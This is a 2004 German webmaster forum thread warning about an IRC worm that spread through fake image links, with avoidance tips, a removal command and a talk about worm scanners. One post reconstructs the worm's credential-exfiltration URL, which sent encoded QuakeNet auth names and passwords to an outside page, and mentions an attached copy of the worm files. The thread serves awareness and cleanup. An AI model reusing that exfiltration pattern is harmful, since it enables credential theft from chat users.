Webmaster Forum Logo Part 1 Webmaster Forum Logo Part 2
Webmaster Forum Logo Part 3
     
 
  :: Anmeldung

Benutzername:

Registrierung...

Passwort:

Passwort vergessen?

angemeldet bleiben


  
  :: Umfrage
Welche sozialen Netzwerke benutzt du regelmäßig?

 Facebook
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 73%
 keines
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 22%
 Google+
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 19%
 Twitter
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 11%
 Xing
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 6%
 schülerVZ
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 5%
 meinVZ
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 4%
 studiVZ
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 4%
 MySpace
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 2%
 LinkedIn
 Webmaster - WebspaceWebmaster - WebspaceWebmaster - Webspace 2%

 ges. 392 Stimmen
 
  :: Buttons

Valid XHTML 1.0 Transitional

Matt

Foren Gott

Dabei seit: 17.09.2002

Beiträge: 5 573

 

1 Zum Seitenanfang

Montag, 17. Mai 2004, 14:01

Neuer IRC Wurm

Zitat


IRC User aufgepasst, wieder einmal gibt es eine Vielzahl an neuen Würmern im Internet Relay Chat. Diese verweisen - scheinbar - auf ein lustiges oder kurioses Bild. Hinter diesem Link steckt allerdings ein Wurm, der den Auth des jeweiligen IRC-Users hackt und somit dem Entwickeler freie Kontrolle über die Channels, in denen der User Operatorstatus oder höher besitzt, verschafft. Außerdem verschickt der User ungewollt den Wurmlink an andere User im IRC. Hinter der Internetadresse des Links steckt allerdings immer eine .tk Endung, an der man den Wurm schon vorher identifizieren kann. Hier ein Beispiel:

(14:02:32) (*beispielname*) www.f*n-p*x.t*/blu*_f**h.j*g <----- looooooooooooooooool


Hier ein paar Regeln, mit denen man garantiert nicht auf IRC-Würmer reinfällt:

* auf URL-Endungen achten
* generell nie auf ominöse Links, die mit Aussagen wie "loooooooool" oder "rooooofl" versehen sind, klicken
* nach Möglichkeit nicht den Internet Explorer benutzen, sondern auf alternative Browser wie Opera oder Mozilla umsteigen, da Würmer meistens nur auf Sicherheitslücken im Internet Explorer ausgelegt sind
* das Gehirn einschalten beim Surfen im IRC

Mit diesen Tipps sollte ein sicheres Chatten und Surfen im IRC (wieder) möglich sein.



Entnommen von insacred.de

Passt lieber auf, User von #wmw wurden infiziert.
nyuuu
 

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

 

2 Zum Seitenanfang

Montag, 17. Mai 2004, 14:56

Vor dem brauch wirklich keiner mehr Angst zu haben, der funktioniert schon seit Samstag 22:00 gar nicht mehr :D

Ich hab exakt am Samstag um 20:00 Beschwerde bei Lycos eingereicht, dass die Seite: http://mitglied.lycos.de/funpixx/ geschlossen werden soll, weil sie gegen die AGBs verstösst und Lycos hat prompt gehandelt.

Ursprünglich hatte der Wurm die Q-Auth-Daten von Quakenet-Usern in der Form an die Entwickler des Wurms weitergeschickt: http://mitglied.lycos.de/funpixx/a.php?d=$encode(AUTHNAME,m)|$encode(AUTHPASS,m)

Da die Seite wie gesagt schon längst down ist, ist der Wurm unschädlich ;)

BTW: Der Wurm nutzte die im Microsoft Security Bulletin MS04-013 veröffentlichte Sicherheitslücke aus. Das Problem ist seit mindestens 13. April 2004 bekannt und seitdem gibt es auch schon einen Patch bei Microsoft :)

[EDIT] Für Interessierte habe ich mal die zwei Dateien, die der Wurm im mIRC-Verzeichnis der Infizierten angelegt hat als Anhang beigefügt. Ich hoffe das verstösst jetzt nicht gegen irgendwelche Regeln :rolleyes:
»Abi_Andy« hat folgende Datei angehängt:
  • wurm.zip (768 Byte - 31 mal heruntergeladen - zuletzt: 24. Februar 2012, 12:38)
Warum kann ein Tag nicht 36 Stunden haben? ://

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (17. Mai 2004, 15:02)

 

Matt

Foren Gott

Dabei seit: 17.09.2002

Beiträge: 5 573

 

3 Zum Seitenanfang

Montag, 17. Mai 2004, 15:00

Na dann :D

Btw, lucius hat ihn, also nicht über merkwürdige Query's wundern ^^
nyuuu
 

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

 

4 Zum Seitenanfang

Montag, 17. Mai 2004, 15:04

@Lucius und alle anderen, die Infiziert sind, hier mal ne Anleitung zum Entfernen:

//unload -rs l.mrc | unload -rs b.mrc | remove l.mrc | remove b.mrc

Einfach in mIRC pasten und [Enter] drücken
Warum kann ein Tag nicht 36 Stunden haben? ://
 

lucius

Foren Gott

Dabei seit: 18.09.2002

Beiträge: 3 869

 

5 Zum Seitenanfang

Montag, 17. Mai 2004, 16:36

tja, einige haben wohl "merkwürdige Query's" von mir bekommen.

ich hatte selber eine gestern abend von silver|slash:

Zitat


Session Start: Sun May 16 22:38:51 2004
Session Ident: Silver|Slash
[[22:38]] Session Ident: Silver|Slash (~sei-ruhig@2aac9c3e.10eff834.cust.bluewin.ch)
[[22:38]] <Silver|Slash> www.fun-pix.tk/blub_fish.jpg <-- YOU!!!
Session Time: Mon May 17 00:00:00 2004
Session Close: Mon May 17 04:07:02 2004


aufmerksam wurde ich um 04:07 uhr auf diese nachricht.

zu dem zeitpunkt sollte laut abi andy die url schon platt gewesen sein.

und jetzt kommt das ganz komische:

besagte dateien l.mrc und b.mrc wurden bei mir weder durch /unload ..., noch durch irgendwelche suchprogramme für wiren, würmer und trojaner gefunden.

auch eine suche mit filerecovery blieb erfolglos.

und jetzt?
God is not on the side of the big battalions, but on the side those who shot best.
[Voltair]
 

Matt

Foren Gott

Dabei seit: 17.09.2002

Beiträge: 5 573

 

6 Zum Seitenanfang

Montag, 17. Mai 2004, 16:37

Naja, du hast ihn ja komischerweise nimmer...jedenfalls kommen keine Querys mehr.
nyuuu
 

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

 

7 Zum Seitenanfang

Montag, 17. Mai 2004, 17:07

öffne mal die mirc.ini und schick mir alles, was in der Sektion [rfiles] (standardmäßig letzte Sektion der INI) steht per Pm, plz, so dürften wir dem Schlingel mit Sicherheit auf die Schliche kommen :D ;)

Ansonsten: Mir wurde schon öfter zugetragen, dass mein Removal-Command eine Fehlermeldung ausgibt, dass die Datei nicht existiert, allerdings hat das Command stehts seinen Zweck erfüllt. Trotzdem: Zur Sicherheit schick mir das einfach schnell per PM. Bin noch ca. 20min online, ansonsten schau ichs mir gegen 02:00 an, wenn ich zurück bin von der Arbeit.

Zitat

Orginal von Lucius
... noch durch irgendwelche suchprogramme für wiren, würmer und trojaner gefunden.


Viren- & Trojanerscanner finden generell keine schädlichen IRC-Scripte X(
Wirklich zuverlässig ist da nur bei fortgeschritten Usern die Intuition und das Wissen, welche Dateien "normal" sind und welche schädlich. Wenn ich im kommenden Jahr vielleicht mal nen paar Wochen Zeit finde, wollte ich nen Scanner extra für IRC-Würmer schreiben, ob der Traum jemals wahr wird steht leider wegen akutem Zeitmangel, atm noch in den Sternen :(
Warum kann ein Tag nicht 36 Stunden haben? ://

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (17. Mai 2004, 17:08)

 

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

 

8 Zum Seitenanfang

Donnerstag, 20. Mai 2004, 12:11

So viel Aufwand wegen gar nichts! :>

Man muss einfach bissele aufpassen beim chatten. und schonmal von dem Wurm gehört: "http://ebay.tk/blablubb/jayjay.jpg <- Eine Nacht mit JayJay biete mit!"

Das is auch sowas...ebay.tk.

Also einfach in Zukunft besser aufpassen, bzw. Mozilla verwenden, dann hat man da keine Probs mehr! ;)

@Abi_Andy:
Biste sicher, dass das klappt? Im Prinzip sind die Würmer ja alle gleich, aber die haben auch immer fast andere dateien, und wie willste die dann erkennen? Dann muss man ständig updaten...

MfG
http://zoryfl.wmw.cc
 

Abi_Andy

Haudegen

Dabei seit: 02.04.2003

Beiträge: 681

 

9 Zum Seitenanfang

Donnerstag, 20. Mai 2004, 16:04

Zitat

Original von zoryfl
So viel Aufwand wegen gar nichts! :>

Man muss einfach bissele aufpassen beim chatten. und schonmal von dem Wurm gehört: "http://ebay.tk/blablubb/jayjay.jpg <- Eine Nacht mit JayJay biete mit!"

Das is auch sowas...ebay.tk.

Also einfach in Zukunft besser aufpassen, bzw. Mozilla verwenden, dann hat man da keine Probs mehr! ;)

@Abi_Andy:
Biste sicher, dass das klappt? Im Prinzip sind die Würmer ja alle gleich, aber die haben auch immer fast andere dateien, und wie willste die dann erkennen? Dann muss man ständig updaten...

MfG


Bei mir versteckt sich hinter "http://ebay.tk/blablubb/jayjay.jpg" nur die Seite http://www.hacker.cd mit ihren Dialern.

@Wurm-Scanner
Sicher muss man da ständig updaten, ist ja im Grunde auch nix anderes als nen Virenscanner, wenn du den nicht updates nutzt der nix, also regelmäßige Updates müssen schon sein, aber genau aus dem Grund ist das Projekt ja auch eher Zukunftsmusik, weil ich eh keine Zeit dafür habe, atm ;)

Btw: Gibt/Gab auch schon Lücken im Mozilla, man ist nie 100%ig sicher, aber wenn du dein Win&IE aufm neuesten Stand hälst ist es auch nicht wesentlich unsicherer als irgendwelche "alternativen".
Warum kann ein Tag nicht 36 Stunden haben? ://

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (20. Mai 2004, 16:05)

 

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

 

10 Zum Seitenanfang

Freitag, 21. Mai 2004, 10:21

ähm..jo....das "/blablubb/ war auch nur zufällig gewählt, weil ich die ganze URL nit mehr wusste! ^^

hm..ständig updaten...kostet eben verdammt viel Zeit...

Aber das musst du eben wissen! :P

MfG
http://zoryfl.wmw.cc
 

wyros

König

Dabei seit: 06.03.2003

Beiträge: 792

 

11 Zum Seitenanfang

Freitag, 21. Mai 2004, 11:34

Zitat

Original von zoryfl
ähm..jo....das "/blablubb/ war auch nur zufällig gewählt, weil ich die ganze URL nit mehr wusste! ^^

hm..ständig updaten...kostet eben verdammt viel Zeit...

Aber das musst du eben wissen! :P

MfG

er muss das ja nicht komplett alleine machen!
ich finds auch shcon gut wenn 10mann ständig auch der suche wären ...
einfach ne hp, wo man immer die neuesten irc würmer findet und eben wie man sie entfernt!

wärt doch schonmal was, oder ?



MfG wyros :P
Save The Planet - Kill Yourself

Ich bin um zu denken, ich denke um zu sein
 

zoryfl

Moderator

Dabei seit: 14.01.2003

Beiträge: 2 766

 

12 Zum Seitenanfang

Freitag, 21. Mai 2004, 15:03

JO...nur das gibts teilweise schon.

Wenn du z.B. mal @Qnet #sicherheit joinst, dann kommen da oft Broadcasts oder amsgs oder channews, wie man den neuesten Wurm entfernt.

Nur ne Hp gibts afaik noch nit..

MfG
http://zoryfl.wmw.cc
 

Peacem@ker

Routinier

Dabei seit: 28.11.2002

Beiträge: 349

 

13 Zum Seitenanfang

Donnerstag, 27. Mai 2004, 16:28

aber erkent die antiviren programe diese wuermer nicht ???

also manchaml springt mein virus program hoch und meldet irgendetwas was in einer log datei ist
 

Dabei seit: 08.12.2002

Beiträge: 1 220

 

14 Zum Seitenanfang

Dienstag, 1. Juni 2004, 22:04

Zitat

Original von zoryfl
JO...nur das gibts teilweise schon.

Wenn du z.B. mal @Qnet #sicherheit joinst, dann kommen da oft Broadcasts oder amsgs oder channews, wie man den neuesten Wurm entfernt.

Nur ne Hp gibts afaik noch nit..

MfG


Der Channel ist g-lined angeblich "#sicherheit Cannot join channel (access denied on this server)"

Die Homepage www.irc-sicherheit.de

funktioniert einwandfrei

Greetz

MaxTPayne